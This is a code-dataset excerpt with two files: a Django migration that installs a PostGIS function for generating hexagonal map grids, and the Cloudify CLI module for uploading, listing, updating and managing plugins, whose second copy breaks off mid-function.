src/django/api/migrations/0033_add_generate_hexgrid_function_20190909.py
|
azavea/open-apparel-registry
|
20f7a6d502d9152c85ee7f2696b25b6badf98924
|
[
"MIT"
] | 1,586
|
2019-01-15T21:54:42.000Z
|
2022-03-31T17:38:14.000Z
|
src/django/api/migrations/0033_add_generate_hexgrid_function_20190909.py
|
Home-ac/Base0
|
04f03b8bf31146783c583df0871ab69fd6309a27
|
[
"MIT"
] | 7
|
2019-02-28T03:32:46.000Z
|
2021-11-04T17:03:46.000Z
|
# Generated by Django 2.2.3 on 2019-09-09 21:11
from django.db import migrations
# SOURCE: https://gist.github.com/mjumbewu/1761802ea06fb78c596f9cf8c9b2e769
create_generate_hexgrid = """
/*
The default SRID is EPSG 3857 (web mercator -- https://epsg.io/3857). However
you can use any SRID you want. All input parameters should be interpreted as
coordinates and distances in whatever the SRID is set to.
SRID 3857 units are [very approximately] meters, and using this projection will
create hex cells that "look right" on a web map (most of which use a web mercator
projection).
If you have bounds in lat/lng degrees, you can convert those into web mercator.
To use EPSG 4326 (geodetic latitude and longitude -- https://epsg.io/4326)
degrees as the bounds, you can do the following:
SELECT gid, ST_Transform(geom, 4326) AS geom
FROM generate_hexgrid(
-- Width of cell, in meters
8192,
-- Minimum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
-- Maximum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
-- The input SRID, default 3857
3857
);
The geometry returned from this function also uses EPSG 3857 coordinates, or
whatever the input SRID is, hence the use of an additional ST_Transform in the
SELECT above.
The gid should be unique for (and characteristic to) each cell. In other words,
if you run this function twice with two distinct but overlapping bounding boxes
using the same cell width, the cells that overlap should have the same gid. So,
if you INSERT these cells into a table with a unique gid column, you should be
able to ignore conflicts (ON CONFLICT DO NOTHING).
Adapted from http://rexdouglass.com/spatial-hexagon-binning-in-postgis/
Snapping inspired by https://medium.com/@goldrydigital/hex-grid-algorithm-for-postgis-4ac45f61d093
*/
CREATE OR REPLACE FUNCTION generate_hexgrid(width float, xmin float, ymin float, xmax float, ymax float, srid int default 3857)
RETURNS TABLE(
gid text,
geom geometry(Polygon)
) AS $grid$
declare
b float := width / 2;
a float := tan(radians(30)) * b; -- tan(30) = 0.577350269
c float := 2 * a;
-- NOTE: The height of one cell is (2a + c), or about 1.154700538 * width.
-- however, for each row, we shift vertically by (2[a + c]) to properly
  -- tessellate the hexagons. Thus, to determine the number of rows needed,
-- we use the latter formula as the height of a row.
height float := 2 * (a + c);
-- Snap the min/max coords to a global grid according to the cell width, so
-- that we minimize the chances of generating misaligned grids for overlapping
-- regions.
index_xmin int := floor(xmin / width);
index_ymin int := floor(ymin / height);
index_xmax int := ceil(xmax / width);
index_ymax int := ceil(ymax / height);
snap_xmin float := index_xmin * width;
snap_ymin float := index_ymin * height;
snap_xmax float := index_xmax * width;
snap_ymax float := index_ymax * height;
-- Calculate the total number of columns and rows. Note that the number of
-- rows is actually half the number of rows, since each vertical iteration
-- accounts for two "rows".
ncol int := abs(index_xmax - index_xmin);
nrow int := abs(index_ymax - index_ymin);
polygon_string varchar := 'POLYGON((' ||
0 || ' ' || 0 || ' , ' ||
b || ' ' || a || ' , ' ||
b || ' ' || a + c || ' , ' ||
0 || ' ' || a + c + a || ' , ' ||
-1 * b || ' ' || a + c || ' , ' ||
-1 * b || ' ' || a || ' , ' ||
0 || ' ' || 0 ||
'))';
BEGIN
RETURN QUERY
SELECT
-- gid is made of the global x index of the cell, the global y index of the
-- cell, and the cell width.
format('%s %s %s',
width,
x_offset + (1 * x_series + index_xmin),
y_offset + (2 * y_series + index_ymin)),
-- geom is transformed using the width and height of a series, and set to
-- the SRID specified.
ST_SetSRID(ST_Translate(two_hex.geom,
x_series * width + snap_xmin,
y_series * height + snap_ymin), srid)
FROM
generate_series(0, ncol, 1) AS x_series,
generate_series(0, nrow, 1) AS y_series,
-- two_hex is a pair of hex cells, one roughly below the other. Thus, both
-- have an x_offset of 0, but the second has a y_offset of 1.
(
-- Series cell #1
SELECT
0 AS x_offset,
0 AS y_offset,
polygon_string::geometry AS geom
UNION
-- Series cell #2
SELECT
0 AS x_offset,
1 AS y_offset,
ST_Translate(polygon_string::geometry, b , a + c) AS geom
) AS two_hex;
END;
$grid$ LANGUAGE plpgsql;
"""
drop_generate_hexgrid = "DROP FUNCTION generate_hexgrid;"
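# Reversible migration: install the generate_hexgrid() PL/pgSQL function and
# drop it again when the migration is rolled back.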
class Migration(migrations.Migration):
dependencies = [
('api', '0032_add_tile_version_row'),
]
operations = [
migrations.RunSQL(create_generate_hexgrid, drop_generate_hexgrid)
]
| 37.406667
| 127
| 0.629478
|
from django.db import migrations
create_generate_hexgrid = """
/*
The default SRID is EPSG 3857 (web mercator -- https://epsg.io/3857). However
you can use any SRID you want. All input parameters should be interpreted as
coordinates and distances in whatever the SRID is set to.
SRID 3857 units are [very approximately] meters, and using this projection will
create hex cells that "look right" on a web map (most of which use a web mercator
projection).
If you have bounds in lat/lng degrees, you can convert those into web mercator.
To use EPSG 4326 (geodetic latitude and longitude -- https://epsg.io/4326)
degrees as the bounds, you can do the following:
SELECT gid, ST_Transform(geom, 4326) AS geom
FROM generate_hexgrid(
-- Width of cell, in meters
8192,
-- Minimum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
-- Maximum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
-- The input SRID, default 3857
3857
);
The geometry returned from this function also uses EPSG 3857 coordinates, or
whatever the input SRID is, hence the use of an additional ST_Transform in the
SELECT above.
The gid should be unique for (and characteristic to) each cell. In other words,
if you run this function twice with two distinct but overlapping bounding boxes
using the same cell width, the cells that overlap should have the same gid. So,
if you INSERT these cells into a table with a unique gid column, you should be
able to ignore conflicts (ON CONFLICT DO NOTHING).
Adapted from http://rexdouglass.com/spatial-hexagon-binning-in-postgis/
Snapping inspired by https://medium.com/@goldrydigital/hex-grid-algorithm-for-postgis-4ac45f61d093
*/
CREATE OR REPLACE FUNCTION generate_hexgrid(width float, xmin float, ymin float, xmax float, ymax float, srid int default 3857)
RETURNS TABLE(
gid text,
geom geometry(Polygon)
) AS $grid$
declare
b float := width / 2;
a float := tan(radians(30)) * b; -- tan(30) = 0.577350269
c float := 2 * a;
-- NOTE: The height of one cell is (2a + c), or about 1.154700538 * width.
-- however, for each row, we shift vertically by (2[a + c]) to properly
  -- tessellate the hexagons. Thus, to determine the number of rows needed,
-- we use the latter formula as the height of a row.
height float := 2 * (a + c);
-- Snap the min/max coords to a global grid according to the cell width, so
-- that we minimize the chances of generating misaligned grids for overlapping
-- regions.
index_xmin int := floor(xmin / width);
index_ymin int := floor(ymin / height);
index_xmax int := ceil(xmax / width);
index_ymax int := ceil(ymax / height);
snap_xmin float := index_xmin * width;
snap_ymin float := index_ymin * height;
snap_xmax float := index_xmax * width;
snap_ymax float := index_ymax * height;
-- Calculate the total number of columns and rows. Note that the number of
-- rows is actually half the number of rows, since each vertical iteration
-- accounts for two "rows".
ncol int := abs(index_xmax - index_xmin);
nrow int := abs(index_ymax - index_ymin);
polygon_string varchar := 'POLYGON((' ||
0 || ' ' || 0 || ' , ' ||
b || ' ' || a || ' , ' ||
b || ' ' || a + c || ' , ' ||
0 || ' ' || a + c + a || ' , ' ||
-1 * b || ' ' || a + c || ' , ' ||
-1 * b || ' ' || a || ' , ' ||
0 || ' ' || 0 ||
'))';
BEGIN
RETURN QUERY
SELECT
-- gid is made of the global x index of the cell, the global y index of the
-- cell, and the cell width.
format('%s %s %s',
width,
x_offset + (1 * x_series + index_xmin),
y_offset + (2 * y_series + index_ymin)),
-- geom is transformed using the width and height of a series, and set to
-- the SRID specified.
ST_SetSRID(ST_Translate(two_hex.geom,
x_series * width + snap_xmin,
y_series * height + snap_ymin), srid)
FROM
generate_series(0, ncol, 1) AS x_series,
generate_series(0, nrow, 1) AS y_series,
-- two_hex is a pair of hex cells, one roughly below the other. Thus, both
-- have an x_offset of 0, but the second has a y_offset of 1.
(
-- Series cell #1
SELECT
0 AS x_offset,
0 AS y_offset,
polygon_string::geometry AS geom
UNION
-- Series cell #2
SELECT
0 AS x_offset,
1 AS y_offset,
ST_Translate(polygon_string::geometry, b , a + c) AS geom
) AS two_hex;
END;
$grid$ LANGUAGE plpgsql;
"""
drop_generate_hexgrid = "DROP FUNCTION generate_hexgrid;"
class Migration(migrations.Migration):
dependencies = [
('api', '0032_add_tile_version_row'),
]
operations = [
migrations.RunSQL(create_generate_hexgrid, drop_generate_hexgrid)
]
| true
| true
|
1c42284aa5378a568fc95740857cb45663a7a7c1
| 15,896
|
py
|
Python
|
cloudify_cli/commands/plugins.py
|
TS-at-WS/cloudify-cli
|
598b54ecd67495a76678177f910cdc5eac6128d0
|
[
"Apache-2.0"
] | null | null | null |
cloudify_cli/commands/plugins.py
|
TS-at-WS/cloudify-cli
|
598b54ecd67495a76678177f910cdc5eac6128d0
|
[
"Apache-2.0"
] | 10
|
2020-08-02T07:45:42.000Z
|
2021-06-11T01:03:45.000Z
|
cloudify_cli/commands/plugins.py
|
TS-at-WS/cloudify-cli
|
598b54ecd67495a76678177f910cdc5eac6128d0
|
[
"Apache-2.0"
] | null | null | null |
########
# Copyright (c) 2018 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
import os
import wagon
from cloudify_cli import execution_events_fetcher
from cloudify_cli.logger import get_events_logger
from cloudify_cli.exceptions import SuppressedCloudifyCliError
from cloudify_rest_client.constants import VISIBILITY_EXCEPT_PRIVATE
from .. import utils
from ..table import print_data, print_single
from ..cli import helptexts, cfy
from ..utils import (prettify_client_error,
get_visibility,
validate_visibility)
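# Column layouts used when printing plugin and plugins-update tables.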
PLUGIN_COLUMNS = ['id', 'package_name', 'package_version', 'distribution',
'supported_platform', 'distribution_release', 'uploaded_at',
'visibility', 'tenant_name', 'created_by', 'yaml_url_path']
PLUGINS_UPDATE_COLUMNS = ['id', 'state', 'blueprint_id', 'temp_blueprint_id',
'execution_id', 'deployments_to_update',
'visibility', 'created_at', 'forced']
GET_DATA_COLUMNS = ['file_server_path']
EXCLUDED_COLUMNS = ['archive_name', 'distribution_version', 'excluded_wheels',
'package_source', 'supported_py_versions', 'wheels']
@cfy.group(name='plugins')
@cfy.options.common_options
def plugins():
"""Handle plugins on the manager
"""
pass
@plugins.command(name='validate',
short_help='Validate a plugin')
@cfy.argument('plugin-path')
@cfy.options.common_options
@cfy.pass_logger
def validate(plugin_path, logger):
"""Validate a plugin
    This will try to validate that the plugin's archive is not corrupted.
A valid plugin is a wagon (http://github.com/cloudify-cosomo/wagon)
in the tar.gz format.
`PLUGIN_PATH` is the path to wagon archive to validate.
"""
logger.info('Validating plugin {0}...'.format(plugin_path))
wagon.validate(plugin_path)
logger.info('Plugin validated successfully')
@plugins.command(name='delete',
short_help='Delete a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.force(help=helptexts.FORCE_DELETE_PLUGIN)
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def delete(plugin_id, force, logger, client, tenant_name):
"""Delete a plugin from the manager
`PLUGIN_ID` is the id of the plugin to delete.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Deleting plugin {0}...'.format(plugin_id))
client.plugins.delete(plugin_id=plugin_id, force=force)
logger.info('Plugin deleted')
@plugins.command(name='upload',
short_help='Upload a plugin [manager only]')
@cfy.argument('plugin-path')
@cfy.options.plugin_yaml_path()
@cfy.options.private_resource
@cfy.options.visibility()
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_context
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def upload(ctx,
plugin_path,
yaml_path,
private_resource,
visibility,
logger,
client,
tenant_name):
"""Upload a plugin to the manager
`PLUGIN_PATH` is the path to wagon archive to upload.
"""
# Test whether the path is a valid URL. If it is, no point in doing local
# validations - it will be validated on the server side anyway
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Creating plugin zip archive..')
wagon_path = utils.get_local_path(plugin_path, create_temp=True)
yaml_path = utils.get_local_path(yaml_path, create_temp=True)
zip_path = utils.zip_files([wagon_path, yaml_path])
progress_handler = utils.generate_progress_handler(zip_path, '')
visibility = get_visibility(private_resource, visibility, logger)
logger.info('Uploading plugin archive (wagon + yaml)..')
try:
plugin = client.plugins.upload(zip_path,
visibility,
progress_handler)
logger.info("Plugin uploaded. Plugin's id is {0}".format(plugin.id))
finally:
os.remove(wagon_path)
os.remove(yaml_path)
os.remove(zip_path)
@plugins.command(name='bundle-upload',
short_help='Upload a bundle of plugins [manager only]')
@cfy.options.plugins_bundle_path
@cfy.pass_client()
@cfy.pass_logger
def upload_caravan(client, logger, path):
if not path:
logger.info("Starting upload of plugins bundle, "
"this may take few minutes to complete.")
path = 'http://repository.cloudifysource.org/' \
'cloudify/wagons/cloudify-plugins-bundle.tgz'
progress = utils.generate_progress_handler(path, '')
plugins_ = client.plugins.upload(path, progress_callback=progress)
logger.info("Bundle uploaded, {0} Plugins installed."
.format(len(plugins_)))
if len(plugins_) > 0:
logger.info("The plugins' ids are:\n{0}\n".
format('\n'.join([p.id for p in plugins_])))
@plugins.command(name='download',
short_help='Download a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.output_path
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_logger
@cfy.pass_client()
def download(plugin_id, output_path, logger, client, tenant_name):
"""Download a plugin from the manager
`PLUGIN_ID` is the id of the plugin to download.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Downloading plugin {0}...'.format(plugin_id))
plugin_name = output_path if output_path else plugin_id
progress_handler = utils.generate_progress_handler(plugin_name, '')
target_file = client.plugins.download(plugin_id,
output_path,
progress_handler)
logger.info('Plugin downloaded as {0}'.format(target_file))
@plugins.command(name='get',
short_help='Retrieve plugin information [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def get(plugin_id, logger, client, tenant_name, get_data):
"""Retrieve information for a specific plugin
`PLUGIN_ID` is the id of the plugin to get information on.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugin {0}...'.format(plugin_id))
plugin = client.plugins.get(plugin_id, _get_data=get_data)
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_single(columns, plugin, 'Plugin:')
@plugins.command(name='list',
short_help='List plugins [manager only]')
@cfy.options.sort_by('uploaded_at')
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugin')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def list(sort_by,
descending,
tenant_name,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
get_data):
"""List all plugins on the manager
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Listing all plugins...')
plugins_list = client.plugins.list(sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_get_data=get_data,
_offset=pagination_offset,
_size=pagination_size)
for plugin in plugins_list:
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_data(columns, plugins_list, 'Plugins:')
total = plugins_list.metadata.pagination.total
logger.info('Showing {0} of {1} plugins'.format(len(plugins_list),
total))
def _transform_plugin_response(plugin):
"""Remove any columns that shouldn't be displayed in the CLI
"""
for column in EXCLUDED_COLUMNS:
plugin.pop(column, None)
@plugins.command(name='set-global',
short_help="Set the plugin's visibility to global")
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_global(plugin_id, logger, client):
"""Set the plugin's visibility to global
`PLUGIN_ID` is the id of the plugin to set global
"""
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_global(plugin_id)
logger.info('Plugin `{0}` was set to global'.format(plugin_id))
logger.info("This command will be deprecated soon, please use the "
"'set-visibility' command instead")
@plugins.command(name='set-visibility',
short_help="Set the plugin's visibility")
@cfy.argument('plugin-id')
@cfy.options.visibility(required=True, valid_values=VISIBILITY_EXCEPT_PRIVATE)
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_visibility(plugin_id, visibility, logger, client):
"""Set the plugin's visibility
`PLUGIN_ID` is the id of the plugin to update
"""
validate_visibility(visibility, valid_values=VISIBILITY_EXCEPT_PRIVATE)
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_visibility(plugin_id, visibility)
logger.info('Plugin `{0}` was set to {1}'.format(plugin_id,
visibility))
@plugins.command(name='update',
short_help='Update the plugins of all the deployments of '
'the blueprint [manager only]')
@cfy.argument('blueprint-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.options.include_logs
@cfy.options.json_output
@cfy.pass_logger
@cfy.pass_client()
@cfy.options.force(help=helptexts.FORCE_PLUGINS_UPDATE)
def update(blueprint_id,
include_logs,
json_output,
logger,
client,
tenant_name,
force):
"""Update the plugins of all the deployments of the given blueprint. This
    will update the deployments one by one until all have succeeded.
`BLUEPRINT_ID` the blueprint's ID to perform the plugins update with.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Updating the plugins of the deployments of the blueprint '
'{}'.format(blueprint_id))
plugins_update = client.plugins_update.update_plugins(blueprint_id, force)
events_logger = get_events_logger(json_output)
execution = execution_events_fetcher.wait_for_execution(
client,
client.executions.get(plugins_update.execution_id),
events_handler=events_logger,
include_logs=include_logs,
timeout=None # don't timeout ever
)
if execution.error:
logger.info("Execution of workflow '{0}' for blueprint "
"'{1}' failed. [error={2}]"
.format(execution.workflow_id,
blueprint_id,
execution.error))
logger.info('Failed updating plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
raise SuppressedCloudifyCliError()
logger.info("Finished executing workflow '{0}'".format(
execution.workflow_id))
logger.info('Successfully updated plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
@plugins.command(
name='get-update',
short_help='Retrieve plugins update information [manager only]'
)
@cfy.argument('plugins-update-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
resource_name_for_help='plugins update')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_get_update(plugins_update_id, logger, client, tenant_name):
"""Retrieve information for a specific plugins update
`PLUGINS_UPDATE_ID` is the id of the plugins update to get information on.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugins update {0}...'.format(plugins_update_id))
plugins_update_dict = client.plugins_update.get(plugins_update_id)
print_single(
PLUGINS_UPDATE_COLUMNS, plugins_update_dict, 'Plugins update:')
@plugins.command(name='history', short_help='List plugins updates '
'[manager only]')
@cfy.options.blueprint_id()
@cfy.options.sort_by()
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugins update')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_history(blueprint_id,
sort_by,
descending,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
tenant_name):
"""Show blueprint history by listing plugins updates
If `--blueprint-id` is provided, list plugins updates for that
blueprint. Otherwise, list plugins updates for all blueprints.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
if blueprint_id:
logger.info('Listing plugins updates for blueprint {0}...'.format(
blueprint_id))
else:
logger.info('Listing all plugins updates...')
plugins_updates = client.plugins_update.list(
sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_offset=pagination_offset,
_size=pagination_size,
blueprint_id=blueprint_id
)
total = plugins_updates.metadata.pagination.total
print_data(
PLUGINS_UPDATE_COLUMNS, plugins_updates, 'Plugins updates:')
logger.info('Showing {0} of {1} plugins updates'.format(
len(plugins_updates), total))
| 37.053613
| 79
| 0.669602
|
import os
import wagon
from cloudify_cli import execution_events_fetcher
from cloudify_cli.logger import get_events_logger
from cloudify_cli.exceptions import SuppressedCloudifyCliError
from cloudify_rest_client.constants import VISIBILITY_EXCEPT_PRIVATE
from .. import utils
from ..table import print_data, print_single
from ..cli import helptexts, cfy
from ..utils import (prettify_client_error,
get_visibility,
validate_visibility)
PLUGIN_COLUMNS = ['id', 'package_name', 'package_version', 'distribution',
'supported_platform', 'distribution_release', 'uploaded_at',
'visibility', 'tenant_name', 'created_by', 'yaml_url_path']
PLUGINS_UPDATE_COLUMNS = ['id', 'state', 'blueprint_id', 'temp_blueprint_id',
'execution_id', 'deployments_to_update',
'visibility', 'created_at', 'forced']
GET_DATA_COLUMNS = ['file_server_path']
EXCLUDED_COLUMNS = ['archive_name', 'distribution_version', 'excluded_wheels',
'package_source', 'supported_py_versions', 'wheels']
@cfy.group(name='plugins')
@cfy.options.common_options
def plugins():
pass
@plugins.command(name='validate',
short_help='Validate a plugin')
@cfy.argument('plugin-path')
@cfy.options.common_options
@cfy.pass_logger
def validate(plugin_path, logger):
logger.info('Validating plugin {0}...'.format(plugin_path))
wagon.validate(plugin_path)
logger.info('Plugin validated successfully')
@plugins.command(name='delete',
short_help='Delete a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.force(help=helptexts.FORCE_DELETE_PLUGIN)
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def delete(plugin_id, force, logger, client, tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Deleting plugin {0}...'.format(plugin_id))
client.plugins.delete(plugin_id=plugin_id, force=force)
logger.info('Plugin deleted')
@plugins.command(name='upload',
short_help='Upload a plugin [manager only]')
@cfy.argument('plugin-path')
@cfy.options.plugin_yaml_path()
@cfy.options.private_resource
@cfy.options.visibility()
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_context
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def upload(ctx,
plugin_path,
yaml_path,
private_resource,
visibility,
logger,
client,
tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Creating plugin zip archive..')
wagon_path = utils.get_local_path(plugin_path, create_temp=True)
yaml_path = utils.get_local_path(yaml_path, create_temp=True)
zip_path = utils.zip_files([wagon_path, yaml_path])
progress_handler = utils.generate_progress_handler(zip_path, '')
visibility = get_visibility(private_resource, visibility, logger)
logger.info('Uploading plugin archive (wagon + yaml)..')
try:
plugin = client.plugins.upload(zip_path,
visibility,
progress_handler)
logger.info("Plugin uploaded. Plugin's id is {0}".format(plugin.id))
finally:
os.remove(wagon_path)
os.remove(yaml_path)
os.remove(zip_path)
@plugins.command(name='bundle-upload',
short_help='Upload a bundle of plugins [manager only]')
@cfy.options.plugins_bundle_path
@cfy.pass_client()
@cfy.pass_logger
def upload_caravan(client, logger, path):
if not path:
logger.info("Starting upload of plugins bundle, "
"this may take few minutes to complete.")
path = 'http://repository.cloudifysource.org/' \
'cloudify/wagons/cloudify-plugins-bundle.tgz'
progress = utils.generate_progress_handler(path, '')
plugins_ = client.plugins.upload(path, progress_callback=progress)
logger.info("Bundle uploaded, {0} Plugins installed."
.format(len(plugins_)))
if len(plugins_) > 0:
logger.info("The plugins' ids are:\n{0}\n".
format('\n'.join([p.id for p in plugins_])))
@plugins.command(name='download',
short_help='Download a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.output_path
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_logger
@cfy.pass_client()
def download(plugin_id, output_path, logger, client, tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Downloading plugin {0}...'.format(plugin_id))
plugin_name = output_path if output_path else plugin_id
progress_handler = utils.generate_progress_handler(plugin_name, '')
target_file = client.plugins.download(plugin_id,
output_path,
progress_handler)
logger.info('Plugin downloaded as {0}'.format(target_file))
@plugins.command(name='get',
short_help='Retrieve plugin information [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def get(plugin_id, logger, client, tenant_name, get_data):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugin {0}...'.format(plugin_id))
plugin = client.plugins.get(plugin_id, _get_data=get_data)
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_single(columns, plugin, 'Plugin:')
@plugins.command(name='list',
short_help='List plugins [manager only]')
@cfy.options.sort_by('uploaded_at')
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugin')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def list(sort_by,
descending,
tenant_name,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
get_data):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Listing all plugins...')
plugins_list = client.plugins.list(sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_get_data=get_data,
_offset=pagination_offset,
_size=pagination_size)
for plugin in plugins_list:
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_data(columns, plugins_list, 'Plugins:')
total = plugins_list.metadata.pagination.total
logger.info('Showing {0} of {1} plugins'.format(len(plugins_list),
total))
def _transform_plugin_response(plugin):
for column in EXCLUDED_COLUMNS:
plugin.pop(column, None)
@plugins.command(name='set-global',
short_help="Set the plugin's visibility to global")
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_global(plugin_id, logger, client):
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_global(plugin_id)
logger.info('Plugin `{0}` was set to global'.format(plugin_id))
logger.info("This command will be deprecated soon, please use the "
"'set-visibility' command instead")
@plugins.command(name='set-visibility',
short_help="Set the plugin's visibility")
@cfy.argument('plugin-id')
@cfy.options.visibility(required=True, valid_values=VISIBILITY_EXCEPT_PRIVATE)
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_visibility(plugin_id, visibility, logger, client):
validate_visibility(visibility, valid_values=VISIBILITY_EXCEPT_PRIVATE)
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_visibility(plugin_id, visibility)
logger.info('Plugin `{0}` was set to {1}'.format(plugin_id,
visibility))
@plugins.command(name='update',
short_help='Update the plugins of all the deployments of '
'the blueprint [manager only]')
@cfy.argument('blueprint-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.options.include_logs
@cfy.options.json_output
@cfy.pass_logger
@cfy.pass_client()
@cfy.options.force(help=helptexts.FORCE_PLUGINS_UPDATE)
def update(blueprint_id,
include_logs,
json_output,
logger,
client,
tenant_name,
force):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Updating the plugins of the deployments of the blueprint '
'{}'.format(blueprint_id))
plugins_update = client.plugins_update.update_plugins(blueprint_id, force)
events_logger = get_events_logger(json_output)
execution = execution_events_fetcher.wait_for_execution(
client,
client.executions.get(plugins_update.execution_id),
events_handler=events_logger,
include_logs=include_logs,
timeout=None
)
if execution.error:
logger.info("Execution of workflow '{0}' for blueprint "
"'{1}' failed. [error={2}]"
.format(execution.workflow_id,
blueprint_id,
execution.error))
logger.info('Failed updating plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
